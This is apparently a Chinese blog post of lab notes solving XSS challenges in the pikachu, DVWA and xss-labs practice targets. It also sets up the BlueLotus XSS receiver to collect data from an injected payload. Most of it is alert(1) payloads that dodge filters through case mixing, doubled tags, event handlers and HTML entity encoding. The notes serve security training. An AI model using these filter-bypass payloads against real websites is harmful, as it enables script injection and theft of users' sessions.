w25 web漏洞之xss

pikachu靶场

第一关-反射型xss(get)

利用hpp漏洞破解
在这里插入图片描述

第二关-反射型xss(post)

登录:admin / 123456
修改postdata内的参数

在这里插入图片描述

第三关-存储型xss

在留言板输入message=<script>alert(1)</script>
在这里插入图片描述

第四关-DOM型xss

what do you see? 是把输入框内的内容拼接url。

常见XSS语句标签,<a>
 <a href=javascript:alert('xss') > xss</a>
 <a href="" onclick="alert(1)"> xss</a>

在这里插入图片描述

第五关-DOM型xss

跟第四关一样
在这里插入图片描述

dvwa靶场

第一关-xss(Reflected)

思路:源码中对

#level:medium
<a href=javascript:alert(1)>123</a> //截图就是使用该命令
或
<scrip<script>t>alert(1)</scrip<script>t> //双写
或
<scripT>alert(1)</scripT> //大小写
或
# level:high
<input onfocus="alert(1);"><img src="x" onerror=alert(1)><button onclick="alert(1)">text</button>

在这里插入图片描述

第二关-xss(Stored)

跟第一关同理,可利用大小写。比较简单

#level:medium & high
<img src="x" onerror=alert(1)>

第三关

xss-labs靶场

第一关

通过修改name后面的值
在这里插入图片描述

第二关

结束前一个标签

"><scripT>alert(1)</scripT>

在这里插入图片描述

第三关

.htmlspecialchars
把预定义的字符转换为HTML实体,预定义的字符是&、'、"、<、>
<?php
$str = "This is some <b>bold</b> text.";
echo htmlspecialchars($str);
?>
输出结果
This is some <b>bold</b> text.
绕过预定义的字符,使用事件
' οnfοcus=alert(1);'

在这里插入图片描述

第四关

会把<(小于号)、>(大于号)都替换为空,思路跟第三关一样

" οnclick=alert(); "

在这里插入图片描述

第五关

里面会对<scri字符做特殊处理

"><a href=javascript:alert(1)>123</a>

在这里插入图片描述

第六关

大小写
在这里插入图片描述

第七关

会把script给替换为空,此时第一反应是双写

"><scripscriptt>alert(1)</scripscriptt>

在这里插入图片描述

第八关

对双引号和单引号进行转义

将keyword进行html实体编码,https://config.net.cn/tools/HtmlEncode.html
javascript:alert(1)  进行html实体编码(十进制),结果如下
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

在这里插入图片描述

第九关

提示你的链接不合法?

在第八关的基础上,添加http的网址,但是需要注释掉
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;/*http://baidu.com*/

在这里插入图片描述

第十关

主要是把隐藏的输入框展示出来

" οnfοcus=alert();  type="text"

在这里插入图片描述

蓝莲花(BlueLotus_XSSReceiver-master)靶场

靶场安装

在小皮上创建网站,设置域名为www.xssblue.cn,然后访问安装网址(www.xssblue.cn/index.php),直接点击安装
在这里插入图片描述

访问dvwa靶场,获取xss(Reflected)的网址(http://dvwa:7001/vulnerabilities/xss_r/)

在这里插入图片描述

在BlueLotus平台创建js模块,

在这里插入图片描述

点击生成payload,复制

在这里插入图片描述

将复制的编码粘贴到dvwa网站中的name文本框,点击submit。

在这里插入图片描述

在BlueLotus平台的首页(http://www.xssblue.cn/admin.php)查看接收信息,有则存在xss漏洞。

在这里插入图片描述

xss的思维导图(https://www.edrawmax.cn/online/share.html?code=2e98d082c6f211eebef32d7bb088ee74)

在这里插入图片描述

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值